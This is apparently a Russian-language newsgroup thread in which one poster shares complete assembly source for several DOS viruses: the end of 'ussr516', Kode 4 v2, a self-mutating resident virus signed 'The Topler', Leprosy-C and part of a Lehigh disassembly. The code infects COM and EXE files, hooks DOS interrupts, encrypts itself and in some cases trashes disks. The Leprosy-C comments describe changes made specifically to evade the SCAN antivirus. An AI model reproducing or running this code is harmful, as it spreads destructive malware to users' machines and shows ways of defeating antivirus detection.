mov ax,3524h ; Get int 24h
call int21 ; (Critical error)
mov [bp-8],bx
mov [bp-6],es
mov dx,int24-start
mov ax,2524h ; Set to new one
call int21
mov ax,4300h ; Get attributes
call int21DSDX
jnc continue
doneinfect:
mov ax,2524h ; Restore crit error
lds dx,dword ptr [bp-8] ; handler
call int21
cli
mov sp,bp
pop bp
pop dx
pop ds
pop bx
pop es
pop cx
pop ax
jmp short callorig21 ; Call orig handler
continue:
mov [bp-0Ah],cx ; Save attributes
test cl,1 ; Check if r/o????
jz noclearattr
xor cx,cx
mov ax,4301h ; Clear attributes
call int21DSDX ; Filename in DS:DX
jc doneinfect ; Quit on error
noclearattr:
mov ax,3D02h ; Open read/write
call int21DSDX ; Filename in DS:DX
jc doneinfect ; Exit if error
mov bx,ax
mov ax,5700h ; Save time/date
call int21
mov [bp-4],cx
mov [bp-2],dx
mov dx,buffer-start
mov cx,4
mov ah,3Fh ; Read 4 bytes to
call int21 ; buffer
jc quitinf
cmp byte ptr ds:[buffer-start],0E9h; Must start with 0E9h
jne quitinf ; Otherwise, quit
mov dx,word ptr ds:[buffer+1-start]; dx = jmploc
dec dx
xor cx,cx
mov ax,4201h ; go there
call int21
mov ds:[buffer-start],ax ; new location offset
mov dx,orig4-start
mov cx,4
mov ah,3Fh ; Read 4 bytes there
call int21
mov dx,ds:[orig4-start]
cmp dl,0E9h ; 0E9h means we might
jne infect ; already be there
mov ax,ds:[orig4+2-start] ; continue checking
add al,dh ; to see if we really
sub al,ah ; are there.
jz quitinf
infect:
xor cx,cx
mov dx,cx

mov ax,4202h ; Go to EOF

call int21
mov ds:[buffer+2-start],ax ; save filesize
mov cx,204h
mov ah,40h ; Write virus
call int21
jc quitinf ; Exit if error
sub cx,ax
jnz quitinf
mov dx,ds:[buffer-start]
mov ax,ds:[buffer+2-start]
sub ax,dx
sub ax,3 ; AX->jmp offset
mov word ptr ds:[buffer+1-start],ax; Set up buffer
mov byte ptr ds:[buffer-start],0E9h; code the jmp
add al,ah
mov byte ptr ds:[buffer+3-start],al
mov ax,4200h ; Rewind to jmploc
call int21
mov dx, buffer-start
mov cx,4 ; Write in the jmp
mov ah,40h
call int21
quitinf:
mov cx,[bp-4]
mov dx,[bp-2]
mov ax,5701h ; Restore date/time
call int21
mov ah,3Eh ; Close file
call int21
mov cx,[bp-0Ah] ; Restore attributes
mov ax,4301h
call int21DSDX
jmp doneinfect ; Return
ussr516 ends
end stub

Hу я вроде все сказал... Может еще что добавлю потом...
[√] Пока _All_ !

▌║▐║│║▌║││║║ DreamLand laboratory. P2Pirates<dog>Mail.ru ICQ 638-547-576
2║5080▌244║0 FTP://87.224.224.182

... По ногам текло, а в рот не попало!

John Zaicev

unread,

May 17, 2012, 8:02:09 AM5/17/12

to

[√] Привет _All_ !

─────────═════════>>> Article From Evolution #2 - YAM '92

Article Title: Kode 4 v2 Virus
Author: Soltan Griss

seg_a segment byte public
assume cs:seg_a, ds:seg_a

org 100h

V_Length equ vend-vstart

KODE4 proc far
start label near

db 0E9h,00h,00h

vstart equ $

mov si,100h ;get si to point to 100
mov di,102h ;get di to point to 102
lback: inc di ;increment di
mov ax,word ptr [si] ;si is ponting to ax
cmp word ptr [di],ax ;compare ax with di loc
jne lback ;INE go back and inc di

mov ax,word ptr [si+1]
cmp ax,word ptr [di+1]
je lout
jmp lback

lout: add di,3h ;jmp stored in the end
sub di,(v_length+100h) ;+3 to get to end and -
mov si,di ;
;**********************************************************************
;*
;* The above code can be re-written as follows...
;* The above idea, although it works is very long in code....
;* when DOS does a load and execute it pushes all registers the last
;* register to be pushed contains the file length. so just subtract
;* the current location
;**********************************************************************
;
;
;
;Host_Off: pop bp
; sub bp,offset host_off
; mov si,bp
;
;*** Before opening any file copy the original three bytes back to 100h
;*** Because they will get overwritten when you check any new files
lea di,temp_buff
add di,si
mov ax,word ptr [di]
mov cl,byte ptr [di+2]
mov di,100h
mov word ptr [di],ax
mov byte ptr [di+2],cl

mov ah,4Eh ;Find first Com file

mov dx,offset filename ; offset of "*.com"
add dx,si
int 21h
jnc back
jmp done

Back:
mov ah,43h ;get rid of read only
mov al,0
mov dx,9eh
int 21h
mov ah,43h
mov al,01
and cx,11111110b
int 21h

mov ax,3D02h ;Open file for read/writing

mov dx,9Eh ;get file name from file DTA
int 21h

jnc next
jmp done
next: mov bx,ax ;save handle in bx

mov ah,57h ;get time date
mov al,0
int 21h

push cx ;put in stack for later
push dx

mov ax,4200h ; Move ptr to start of file

xor cx,cx
xor dx,dx
int 21h

mov ah,3fh ;load first 3 bytes
mov cx,3

mov dx,offset temp_buff
add dx,si
int 21h

xor cx,cx ;move file pointer to end of file
xor dx,dx
mov ax,4202h
int 21h
sub ax,3 ; Fix for real location
push ax
; nop ;
; nop ; used for debugging
; nop ;
; nop ;
; nop

mov di,offset temp_buff
add di,si
mov word ptr [j_code2+si],ax; Save two bytes in a
; word [jumpin]

cmp byte ptr [di],0e9h ;look for a jmp at begining
jne infect

mov cx,word ptr [di+1] ;check for XXX bytes at end
pop ax
sub ax,v_length
cmp ax, cx ; jump (id string to check)
jne infect
jmp finish

infect:

xor cx,cx ;move file pointer to begining
xor dx,dx ;to write jump
mov ax,4200h
int 21h

mov ah,40h ;write jump in first 3 bytes
mov cx,3
mov dx, offset j_code1
add dx,si
int 21h

xor cx,cx ;move file pointer to end of file
xor dx,dx
mov ax, 4202h
int 21h

mov dx,offset vstart
add dx,si ;Start writing at top of virus
mov cx,(vend-vstart) ; Set for length of virus

mov ah,40h ;Write Data into the file
int 21h

Finish: pop dx ;Restore old dates and times

pop cx
mov ah,57h
mov al,01h
int 21h

mov ah,3Eh ;Close the file
int 21h

mov ah,4Fh ;Find Next file
int 21h

jc done
jmp back

done:
mov bp,100h
jmp bp

filename db "*.com",0

DATA db " -=+ Kode4 +=-, The one and ONLY!$"

j_code1 db 0e9h
j_code2 db 00h,00h
temp_buff db 0cdh,020h,090h ; CD 20 NOP
kode4 endp

vend equ $

seg_a ends

end start

Hу я вроде все сказал... Может еще что добавлю потом...
[√] Пока _All_ !

▌║▐║│║▌║││║║ DreamLand laboratory. P2Pirates<dog>Mail.ru ICQ 638-547-576
2║5080▌244║0 FTP://87.224.224.182

... Я не механик. Я даже не знаю, каким концом отвёртки забивают гвозди.

John Zaicev

unread,

May 18, 2012, 2:16:02 AM5/18/12

to

[√] Привет _All_ !

code segment
assume cs:code
org 100h

start:
jmp begin

org 200h
begin:
jmp short beg

FileSize dw 0E00h; 02h
int21vec dd 0 ; 04h
oldint13 dd 0 ; 08h
oldint24 dd 0 ; 0Ch
Date dw 0 ; 10h
Time dw 0 ; 12h
db 1 ; 14h
version dw 0 ; 15h - mutation status

beg:
call codenext
codenext:
pop si
mutation1:
cli
push ds
pop es
mov bp,sp
mov sp,si
add sp,3FEh-(offset codenext-offset begin)
mutation2:
mov cx,ss
mov ax,cs
mov ss,ax
pop bx
dec sp
dec sp
add si,offset mybeg-offset codenext
codeloop:
pop ax
xor al,bh
push ax
dec sp
cmp sp,si
jnc codeloop
mybeg:
mov ax,es
dec ax
mov ds,ax
add word ptr ds:[3],-082h
mov bx,ds:[3]
mov byte ptr ds:[0],5ah
inc ax
inc bx
add bx,ax
mov es,bx
mov ss,cx
add si,offset begin-offset mybeg
mov bx,ds
mov ds,ax
mov sp,bp
push si
xor di,di
mov cx,400h
cld
rep movsb
pop si
push bx
mov bx,offset inblock-offset begin
push es
push bx
retf
inblock:
mov es,ax
mov ax,cs:[2] ; File Size
add ax,100h
mov di,si
mov si,ax
mov cx,400h
rep movsb
pop es
xor ax,ax
mov ds,ax
sti
cmp word ptr ds:[21h*4],offset int21-offset begin
jne count
sub word ptr es:[3],-082h
test byte ptr ds:[46ch],11100111b
jnz efect1
push cs
pop ds
mov si,offset msg-offset begin
efect2:
lodsb
or al,0
jz efect3
mov ah,0eh
int 10h
jmp short efect2
efect3:
mov ah,32h
xor dl,dl
int 21h
jc efect1
call setaddr
call setint
mov dx,ds:[bx+10h]
mov ah,19h
int 21h
mov cx,2
int 26h
pop bx
call setint
efect1:
jmp quit
count:
add word ptr es:[12h],-082h
mov bx,ds:[46ch]
push ds

push cs
pop ds
push cs
pop es

mov byte ptr ds:[14h],1
and bh,80h
mov ds:[4ffh],bh
test bl,00000001b
jnz mut1
mov si,offset mutation1-offset begin
add si,ds:[15h]
lodsb
xchg al,ds:[si]
mov ds:[si-1],al
mut1:
test bl,00000010b
jnz mut2
mov si,offset mutation2-offset begin
add si,ds:[15h]
lodsw
xchg ax,ds:[si]
mov ds:[si-2],ax
mut2:
test bl,00000100b
jnz mut3
mov si,offset codeloop-offset begin
mov al,2
xor byte ptr ds:[si],al
xor byte ptr ds:[si+2],al
xor byte ptr ds:[si+3],al
mut3:
test bl,00001000b
jnz mut4
mov si,offset codenext-offset begin
mov di,400h
mov cx,offset codeloop-offset codenext-2
push si
push di
lodsb
cmp al,5eh
je jmp1
inc si
jmp1:
push cx
rep movsb
pop cx
pop si
pop di
cmp al,5eh
je jmp2
mov al,5Eh
stosb
rep movsb
mov al,90h
stosb
xor ax,ax
jmp short jmp3
jmp2:
mov ax,0C68Fh
stosw
rep movsb
mov ax,1
jmp3:
mov cs:[15h],ax
mut4:
mov ah,30h
int 21h
cmp ax,1e03h
jne nodos33
mov ah,34h
int 21h
mov bx,1460h
jmp short dos33
nodos33:
mov ax,3521h
int 21h
dos33:
mov ds:[4],bx
mov ds:[6],es
mov si,21h*4
pop ds
push si
push cs
pop es
mov di,offset intend-offset begin+1
movsw
movsw
pop di
push ds
pop es
mov ax,offset int21-offset begin
stosw
mov ax,cs
stosw
mov di,offset mybeg-offset begin
mov al,cs:[3ffh]
coderloop:
xor cs:[di],al
inc di
cmp di,offset coderloop-offset begin
jc coderloop
quit:
mov ah,62h
int 21h
push bx
mov ds,bx
mov es,bx
mov ax,100h
push ax
retf
;------------------------------------------------------------------------------
infect:
push si
push ds
push es
push di
cld
push cs
pop ds
xor dx,dx
call movefp
mov dx,400h
mov ah,3fh
mov cx,3
call Dos
jc infect4
xor di,di
mov ax,word ptr ds:[400h]
mov cx,ds:[0]
cmp cx,ax
je infect8
cmp al,0EBH ; near jmp
jne infect1
mov al,ah
xor ah,ah
add ax,2
mov di,ax
infect1:
cmp al,0E9h ; far jmp
jne infect2
mov ax,ds:[401h]
add ax,3
mov di,ax
xor ax,ax
infect2:
cmp ax,'MZ'
je infect4
cmp ax,'ZM'
jne infect3
infect4:
stc
infect8:
jmp infectquit
infect3:
mov dx,di
push cx
call movefp
mov dx,400h
mov ah,3fh
mov cx,dx
call Dos
pop cx
jc infect4
cmp ds:[400h],cx
je infect8
mov ax,di
sub ah,-4
cmp ax,ds:[2]
jnc infect4
mov dx,ds:[2]
call movefp
mov dx,400h
mov cx,dx
mov ah,40h
call Dos
infect6:
jc infectquit
mov dx,di
call movefp
push cs
pop es
mov di,400h
push di
push di
xor si,si
mov cx,di
rep movsb
mov si,400h+offset coderloop-offset begin
mov al,ds:[7ffh]
infect5:
xor ds:[si],al
inc si
cmp si,07ffh
jc infect5
pop cx
pop dx
mov ah,40h
call Dos
infectquit:
pop di
pop es
pop ds
pop si
ret
int21:
cmp ax,4b00h
je exec
cmp ah,3eh
je close

cmp ah,11h
je dir
cmp ah,12h
je dir

intend:
db 0eah,0,0,0,0

dir:
push si
mov si,offset intend-offset begin+1
pushf
call dword ptr cs:[si]
pop si
push ax
push bx
push es
mov ah,2fh
call dos

cmp byte ptr es:[bx],0ffh

jne dir2
add bx,7
dir2:

mov ax,es:[bx+17h]
and ax,1fh

cmp ax,1eh
jne dir1
mov ax,es:[bx+1dh]
cmp ax,0801h
jc dir1
sub ax,400h
mov es:[bx+1dh],ax
dir1:

pop es
pop bx
pop ax

iret
int24:
mov al,3
iret
Dos:
pushf
call dword ptr cs:[4]
ret
moveFP:
xor cx,cx
mov ax,4200h
call Dos
ret
exec:
push ax
push bx
mov byte ptr cs:[14h],0
mov ax,3d00h
call dos
mov bx,ax
mov ah,3eh
int 21h
pop bx
pop ax
intendjmp:
jmp short intend
close:
or byte ptr cs:[14h],0
jnz intendjmp
push cx
push dx
push di
push es
push ax
push bx
call setaddr
call setint
mov ax,1220h
int 2fh
jc closequit
mov ax,1216h
mov bl,es:[di]
xor bh,bh
int 2fh
mov ax,es:[di+11h]
mov cs:[2],ax
mov ax,es:[di+0dh]
and al,0f8h
mov cs:[12h],ax
mov ax,es:[di+0fh]
mov cs:[10h],ax
cmp word ptr es:[di+29h],'MO'
jne closequit
cmp byte ptr es:[di+28h],'C'
jne closequit
cmp cs:[2],0FA00h
jnc closequit
mov al,20h
xchg al,es:[di+4]
mov ah,2
xchg es:[di+2],ah
pop bx
push bx
push ax
call infect
pop ax
mov es:[di+4],al
mov es:[di+2],ah
mov cx,cs:[12h]
jc close1
or cl,1fh
and cl,0feh
close1:
mov dx,cs:[10h]
mov ax,5701h
call Dos
closequit:
pop bx
pop ax
pop es
pop di
pop dx
pop cx
call dos
call setint
retf 02
setaddr:
mov ah,13h
int 2fh
mov cs:[8d],bx
mov cs:[10d],es
int 2fh
mov cs:[12d],offset int24-offset begin
mov cs:[14d],cs
ret
setint:
push ax
push si
push ds
pushf
cli
cld
xor ax,ax
mov ds,ax
mov si,13h*4
lodsw
xchg ax,cs:[8]
mov ds:[si-2],ax
lodsw
xchg ax,cs:[10d]
mov ds:[si-2],ax
mov si,24h*4
lodsw
xchg ax,cs:[12d]
mov ds:[si-2],ax
lodsw
xchg ax,cs:[14d]
mov ds:[si-2],ax
popf
pop ds
pop si
pop ax
ret
msg:
db 'The leech live ...',0
db 'April 1991 The Topler.',0

org 0F00h

int 20h

code ends

end start

Hу я вроде все сказал... Может еще что добавлю потом...
[√] Пока _All_ !

▌║▐║│║▌║││║║ DreamLand laboratory. P2Pirates<dog>Mail.ru ICQ 638-547-576
2║5080▌244║0 FTP://87.224.224.182

... В зазор между двумя эпохами может провалиться несколько поколений.

John Zaicev

unread,

May 18, 2012, 2:16:27 AM5/18/12

to

[√] Привет _All_ !

; <LEPROSYB.ASM> - Leprosy-B Virus Source
; Copy-ya-right (c) 1990 by PCM2.
;
; This file is the source code to the Leprosy-B virus. It should
; be assembled with an MASM-compatible assembler; it has been tested
; and assembles correctly with both MASM 4.0 and Turbo Assembler 1.0.
; It should be made into a .COM file before executing, with either
; the "/t" command line flag in TLINK or Microsoft's EXE2BIN utility.
;
; This program has the potential to permanently destroy executable
; images on any disk medium. Other modifications may have been made
; subsequent to the original release by the author, either benign,
; or which could result in further harm should this program be run.
; In any case, the author assumes no responsibility for any damage
; caused by this program, incidental or otherwise. As a precaution,
; this program should not be turned over to irresponsible hands...
; (unlike people like us, that is).
;
;;-=р°+?Ы?+°р=-=р°+?Ы?+°р=-=р°+?Ы?+°р=-=р°+?Ы?+°р=-=р°+?Ы?+°р=-=р°+?Ы?+°р=-
;;
;; <LEPROSYC.ASM> - This virus is not really Leprosy-B. It is, in
;; fact, ALMOST the same. When I encountered the
;; source code and assembled it, I found, obviously
;; to my disappointment, that SCAN v77 could find
;; it. Since it is a self-encrypting virus, I knew
;; EXACTLY how to fix this problem (after all,
;; being part of McPhee's programs is a sure way to
;; know that your virus has been a big hit, but it
;; also means that it will soon meet a terrible end.
;; Presented with such a sad situation, I decided I
;; would modify the virus to give it one more shot
;; at the outside world. Not only that, but I will
;; make TWO new versions. This one, in particular,
;; will preserve the traditional length of 666, and
;; will only have a slight modification. You see,
;; since the virus encrypts itself, McPhee must go
;; on 1 or both of two paths. He must either use
;; the whole non-encrypted portion as an ID string,
;; or he must use the file offset where the value
;; for decrypting is normally stored, XOR it with
;; the rest of the program (this is how it encrypts
;; and decrypts itself), and then try to identify
;; the decrypted code as the virus. By changing
;; where the encryption value is stored in the non-
;; encrypted portion and putting a zero there in-
;; stead, (along with altering the primary instruc-
;; tions slightly), I have made it undetectable by
;; SCAN, despite the fact that it is (in all other
;; aspects) the same damn thing.
;; Have fun!
;; The BOOT SECTOR Infector...
;;
;; NOTE: Also, (in case you haven't already noticed) all of the changes
;; I make to this program will have a double semicolon (;;) on
;; them somewhere. This is to reinforce the fact that I DID
;; NOT do the original work on this virus. That credit is left
;; appropriately to PCM2. And I respect his brilliance in its
;; coding (especially the encrypt/decrypt portion!) <grin!>
;; L8r peepz!
;;

title "Leprosy-C Virus by PCM2, August 1990"
;; With additional modifications by TBSI, June 1991

cr equ 13 ; Carriage return ASCII code
lf equ 10 ; Linefeed ASCII code
tab equ 9 ; Tab ASCII code
virus_size equ 666 ; Size of the virus file
code_start equ 100h ; Address right after PSP in memory
dta equ 80h ; Addr of default disk transfer area
datestamp equ 24 ; Offset in DTA of file's date stamp
timestamp equ 22 ; Offset in DTA of file's time stamp
filename equ 30 ; Offset in DTA of ASCIIZ filename
attribute equ 21 ; Offset in DTA of file attribute

code segment 'code' ; Open code segment
assume cs:code,ds:code ; One segment for both code & data
org code_start ; Start code image after PSP

;---------------------------------------------------------------------
; All executable code is contained in boundaries of procedure "main".
; The following code, until the start of "virus_code", is the non-
; encrypted CMT portion of the code to load up the real program.
;---------------------------------------------------------------------
main proc near ; Code execution begins here
call encrypt_decrypt ; Decrypt the real virus code
jmp random_mutation ; Put the virus into action
db 0 ;; This line inserted by TBSI. If
;; McPhee uses the second technique
;; described in my speech, then it
;; will find the zero and consider
;; it to be the value it wants, even
;; though using a zero will make it
;; do absolutely NOTHING!
encrypt_val db 00h ; Hold value to encrypt by here

; ---------- Encrypt, save, and restore the virus code -----------
infect_file:
mov bx,handle ; Get the handle
push bx ; Save it on the stack
call encrypt_decrypt ; Encrypt most of the code
pop bx ; Get back the handle
nop ;; Added by TBSI to through of McPhee
mov cx,virus_size ; Total number of bytes to write
mov dx,code_start ; Buffer where code starts in memory
mov ah,40h ; DOS write-to-handle service
int 21h ; Write the virus code into the file
call encrypt_decrypt ; Restore the code as it was
ret ; Go back to where you came from

; --------------- Encrypt or decrypt the virus code ----------------
encrypt_decrypt:
mov bx,offset virus_code ; Get address to start encrypt/decrypt
xor_loop: ; Start cycle here
mov ah,[bx] ; Get the current byte
xor ah,encrypt_val ; Engage/disengage XOR scheme on it
mov [bx],ah ; Put it back where we got it
inc bx ; Move BX ahead a byte
nop ;; Added by TBSI to through of McPhee
cmp bx,offset virus_code+virus_size ; Are we at the end?
jle xor_loop ; If not, do another cycle
ret ; and go back where we came from

;-----------------------------------------------------------------------
; The rest of the code from here on remains encrypted until run-time,
; using a fundamental XOR technique that changes via CMT.
;-----------------------------------------------------------------------
virus_code:

;----------------------------------------------------------------------------
; All strings are kept here in the file, and automatically encrypted.
; Please don't be a lamer and change the strings and say you wrote a virus.
; Because of Cybernetic Mutation Technology(tm), the CRC of this file often
; changes, even when the strings stay the same.
;----------------------------------------------------------------------------
exe_filespec db "*.EXE",0
com_filespec db "*.COM",0
newdir db "..",0
fake_msg db cr,lf,"Program too big to fit in memory$"
virus_msg1 db cr,lf,tab,"ATTENTION! Your computer has been afflicted
with$"
virus_msg2 db cr,lf,tab,"the incurable decay that is the fate wrought
by$"
virus_msg3 db cr,lf,tab,"Leprosy Strain B, a virus employing
Cybernetic$"
virus_msg4 db cr,lf,tab,"Mutation Technology(tm) and invented by PCM2
08/90.$"
compare_buf db 20 dup (?) ; Buffer to compare files in
files_found db ?
files_infected db ?
orig_time dw ?
orig_date dw ?
orig_attr dw ?
handle dw ?
success db ?

random_mutation: ; First decide if virus is to mutate
mov ah,2ch ; Set up DOS function to get time
int 21h
cmp encrypt_val,0 ; Is this a first-run virus copy?
je install_val ; If so, install whatever you get.
cmp dh,15 ; Is it less than 16 seconds?
jg find_extension ; If not, don't mutate this time
install_val:
cmp dl,0 ; Will we be encrypting using zero?
je random_mutation ; If so, get a new value.
mov encrypt_val,dl ; Otherwise, save the new value
find_extension: ; Locate file w/ valid extension
mov files_found,0 ; Count infected files found
mov files_infected,4 ; BX counts file infected so far
mov success,0
find_exe:
mov cx,00100111b ; Look for all flat file attributes
mov dx,offset exe_filespec ; Check for .EXE extension first
mov ah,4eh ; Call DOS find first service
int 21h
cmp ax,12h ; Are no files found?
je find_com ; If not, nothing more to do
call find_healthy ; Otherwise, try to find healthy .EXE
find_com:
mov cx,00100111b ; Look for all flat file attributes
mov dx,offset com_filespec ; Check for .COM extension now
mov ah,4eh ; Call DOS find first service
int 21h
cmp ax,12h ; Are no files found?
je chdir ; If not, step back a directory
call find_healthy ; Otherwise, try to find healthy .COM
chdir: ; Routine to step back one level
mov dx,offset newdir ; Load DX with address of pathname
mov ah,3bh ; Change directory DOS service
int 21h
dec files_infected ; This counts as infecting a file
jnz find_exe ; If we're still rolling, find another
jmp exit_virus ; Otherwise let's pack it up
find_healthy:
mov bx,dta ; Point BX to address of DTA
mov ax,[bx]+attribute ; Get the current file's attribute
mov orig_attr,ax ; Save it
mov ax,[bx]+timestamp ; Get the current file's time stamp
mov orig_time,ax ; Save it
mov ax,[bx]+datestamp ; Get the current file's data stamp
mov orig_date,ax ; Save it
mov dx,dta+filename ; Get the filename to change attribute
mov cx,0 ; Clear all attribute bytes
mov al,1 ; Set attribute sub-function
mov ah,43h ; Call DOS service to do it
int 21h
mov al,2 ; Set up to open handle for read/write
mov ah,3dh ; Open file handle DOS service
int 21h
mov handle,ax ; Save the file handle
mov bx,ax ; Transfer the handle to BX for read
mov cx,20 ; Read in the top 20 bytes of file
mov dx,offset compare_buf ; Use the small buffer up top
mov ah,3fh ; DOS read-from-handle service
int 21h
mov bx,offset compare_buf ; Adjust the encryption value
mov ah,encrypt_val ; for accurate comparison
mov [bx+6],ah
mov si,code_start ; One array to compare is this file
mov di,offset compare_buf ; The other array is the buffer
mov ax,ds ; Transfer the DS register...
mov es,ax ; ...to the ES register
cld
repe cmpsb ; Compare the buffer to the virus
jne healthy ; If different, the file is healthy!
call close_file ; Close it up otherwise
inc files_found ; Chalk up another fucked up file
continue_search:
mov ah,4fh ; Find next DOS function
int 21h ; Try to find another same type file
cmp ax,12h ; Are there any more files?
je no_more_found ; If not, get outta here
jmp find_healthy ; If so, try the process on this one!
no_more_found:
ret ; Go back to where we came from
healthy:
mov bx,handle ; Get the file handle
mov ah,3eh ; Close it for now
int 21h
mov ah,3dh ; Open it again, to reset it
mov dx,dta+filename
mov al,2
int 21h
mov handle,ax ; Save the handle again
call infect_file ; Infect the healthy file
call close_file ; Close down this operation
inc success ; Indicate we did something this time
dec files_infected ; Scratch off another file on agenda
jz exit_virus ; If we're through, terminate
jmp continue_search ; Otherwise, try another
ret
close_file:
mov bx,handle ; Get the file handle off the stack
mov cx,orig_time ; Get the date stamp
mov dx,orig_date ; Get the time stamp
mov al,1 ; Set file date/time sub-service
mov ah,57h ; Get/Set file date and time service
int 21h ; Call DOS
mov bx,handle
mov ah,3eh ; Close handle DOS service
int 21h
mov cx,orig_attr ; Get the file's original attribute
mov al,1 ; Instruct DOS to put it back there
mov dx,dta+filename ; Feed it the filename
mov ah,43h ; Call DOS
int 21h
ret
exit_virus:
cmp files_found,6 ; Are at least 6 files infected?
jl print_fake ; If not, keep a low profile
cmp success,0 ; Did we infect anything?
jg print_fake ; If so, cover it up
mov ah,09h ; Use DOS print string service
mov dx,offset virus_msg1 ; Load the address of the first line
int 21h ; Print it
mov dx,offset virus_msg2 ; Load the second line
int 21h ; (etc)
mov dx,offset virus_msg3
int 21h
mov dx,offset virus_msg4
int 21h
jmp terminate
print_fake:
mov ah,09h ; Use DOS to print fake error message
mov dx,offset fake_msg
int 21h
terminate:
mov ah,4ch ; DOS terminate process function
int 21h ; Call DOS to get out of this program

filler db 8 dup (90h) ; Pad out the file length to 666 bytes

main endp
code ends
end main

Hу я вроде все сказал... Может еще что добавлю потом...
[√] Пока _All_ !

▌║▐║│║▌║││║║ DreamLand laboratory. P2Pirates<dog>Mail.ru ICQ 638-547-576
2║5080▌244║0 FTP://87.224.224.182

... Семь раз отпей , один раз отлей.

John Zaicev

unread,

May 18, 2012, 2:16:14 AM5/18/12

to

[–] ًزة×إش _All_ !

page 65,132
title The 'Lehigh' Virus
; ¥ ¨
; ، British Computer Virus Research Centre ،
; ، 12 Guildford Street, Brighton, East Sussex, BN1 3LS, England ،
; ، Telephone: Domestic 0273-26105, International +44-273-26105 ،
; ، ،
; ، The 'Lehigh' Virus ،
; ، Disassembled by Joe Hirst, July 1989 ،
; ، ،
; ، Copyright (c) Joe Hirst 1989. ،
; ، ،
; ، This listing is only to be made available to virus researchers ،
; ، or software writers on a need-to-know basis. ،
; « ®

; The disassembly has been tested by re-assembly using MASM 5.0.

CODE SEGMENT BYTE PUBLIC 'CODE'
ASSUME CS:CODE,DS:CODE

; Interrupt 21H routine

BP0010: PUSH AX
PUSH BX
CMP AH,4BH ; Load function?
JE BP0020 ; Branch if yes
CMP AH,4EH ; Find file file?
JE BP0020 ; Branch if yes
JMP BP0170 ; Pass interrupt on

; Load or find file function

BP0020: MOV BX,DX ; Get pathname pointer
CMP BYTE PTR [BX+1],':' ; Is a disk specified?
JNE BP0030 ; Branch if not
MOV AL,[BX] ; Get disk letter
JMP BP0040

; Is there a COMMAND.COM on disk?

BP0030: MOV AH,19H ; Get current disk function
INT 44H ; DOS service (diverted INT 21H)
ADD AL,'a' ; Convert to letter
BP0040: PUSH DS
PUSH CX
PUSH DX
PUSH DI
PUSH CS ; \ Set DS to CS
POP DS ; /
MOV BX,OFFSET PATHNM ; Address pathname
MOV [BX],AL ; Store disk letter in pathname
MOV DX,BX ; Move pathname address
MOV AX,3D02H ; Open handle (R/W) function
INT 44H ; DOS service (diverted INT 21H)
JNB BP0050 ; Branch if no error
JMP BP0160 ; Restore registers and terminate

; Is COMMAND.COM infected?

BP0050: MOV BX,AX ; Move file handle
MOV AX,4202H ; Move file pointer function (EOF)
XOR CX,CX ; \ No offset
MOV DX,CX ; /
INT 44H ; DOS service (diverted INT 21H)
MOV DX,AX ; Copy file length
MOV FILELN,AX ; Save file length
SUB DX,2 ; Address last word of file
MOV AX,4200H ; Move file pointer function (start)
INT 44H ; DOS service (diverted INT 21H)
MOV DX,OFFSET BUFFER ; Address read buffer
MOV CX,2 ; Length to read
MOV AH,3FH ; Read handle function
INT 44H ; DOS service (diverted INT 21H)
CMP WORD PTR BUFFER,65A9H ; Is file infected?
JNE BP0060 ; Branch if not
JMP BP0080

; Infect COMMAND.COM

BP0060: XOR DX,DX ; \ No offset
MOV CX,DX ; /
MOV AX,4200H ; Move file pointer function (start)
INT 44H ; DOS service (diverted INT 21H)
MOV CX,3 ; Length to read
MOV DX,OFFSET BUFFER ; Address read buffer
MOV DI,DX ; Copy address
MOV AH,3FH ; Read handle function
INT 44H ; DOS service (diverted INT 21H)
MOV AX,[DI+1] ; Get displacement from initial jump
ADD AX,0103H ; Convert to address for COM file
MOV ENTPTR,AX ; Save file entry address
MOV DX,FILELN ; Get file length
SUB DX,OFFSET ENDADR ; Subtract length of virus
DEC DX ; ...and one more
MOV [DI],DX ; Put offset into jump instruction
XOR CX,CX ; Clear high offset for move
MOV AX,4200H ; Move file pointer function (start)
INT 44H ; DOS service (diverted INT 21H)
MOV AL,INFCNT ; Get infection count
PUSH AX ; Preserve infection count
MOV BYTE PTR INFCNT,0 ; Set infection count to zero
MOV CX,OFFSET ENDADR ; \ Get length of virus
INC CX ; /
XOR DX,DX ; Address start of virus
MOV AH,40H ; Write handle function
INT 44H ; DOS service (diverted INT 21H)
POP AX ; Recover infection count
MOV INFCNT,AL ; Restore original infection count
XOR CX,CX ; \ Address second byte of program
MOV DX,1 ; /
MOV AX,4200H ; Move file pointer function (start)
INT 44H ; DOS service (diverted INT 21H)
MOV AX,[DI] ; Get virus offset
ADD AX,OFFSET BP0180 ; Add entry point
SUB AX,3 ; Subtract length of jump instruction
MOV [DI],AX ; Replace offset
MOV DX,DI ; Address stored offset
MOV CX,2 ; Length to write
MOV AH,40H ; Write handle function
INT 44H ; DOS service (diverted INT 21H)
INC BYTE PTR INFCNT ; Increment infection count
CMP BYTE PTR INFCNT,4 ; Have we reached target?
JB BP0070 ; Branch if not
JMP BP0110 ; Trash disk

; Is disk A or B?

BP0070: MOV BYTE PTR N_AORB,0 ; Set off "not A or B" switch
CMP BYTE PTR CURDSK,2 ; Is current disk A or B?
JB BP0080 ; Branch if yes
MOV BYTE PTR N_AORB,1 ; Set on "not A or B" switch
BP0080: MOV AH,3EH ; Close handle function
INT 44H ; DOS service (diverted INT 21H)
CMP BYTE PTR N_AORB,1 ; Is "not A or B" switch on?
JE BP0090 ; Branch if yes
JMP BP0160 ; Restore registers and terminate

; Disk not A or B

BP0090: MOV BYTE PTR N_AORB,0 ; Set off "not A or B" switch
MOV BX,OFFSET PATHNM ; Address pathname
MOV AL,CURDSK ; Get current disk
ADD AL,'a' ; Convert to letter
MOV [BX],AL ; Store letter in pathname
MOV DX,BX ; Move pathname address
MOV AX,3D02H ; Open handle (R/W) function
INT 44H ; DOS service (diverted INT 21H)
JNB BP0100 ; Branch if no error
JMP BP0160 ; Restore registers and terminate

; Set infection count same as in current program

BP0100: MOV BX,AX
MOV AX,4202H ; Move file pointer function (EOF)
XOR CX,CX ; \ No offset
MOV DX,CX ; /
INT 44H ; DOS service (diverted INT 21H)
MOV DX,AX ; \ Address back to infection count
SUB DX,7 ; /
MOV AX,4200H ; Move file pointer function (start)
INT 44H ; DOS service (diverted INT 21H)
MOV CX,1 ; Length to write
MOV DX,OFFSET INFCNT ; Address infection count
MOV AH,40H ; Write handle function
INT 44H ; DOS service (diverted INT 21H)
MOV AH,3EH ; Close handle function
INT 44H ; DOS service (diverted INT 21H)
JMP BP0160 ; Restore registers and terminate

; Trash disk

BP0110: MOV AL,CURDSK ; Get current disk
CMP AL,2 ; Is disk A or B?
JNB BP0150 ; Branch if not
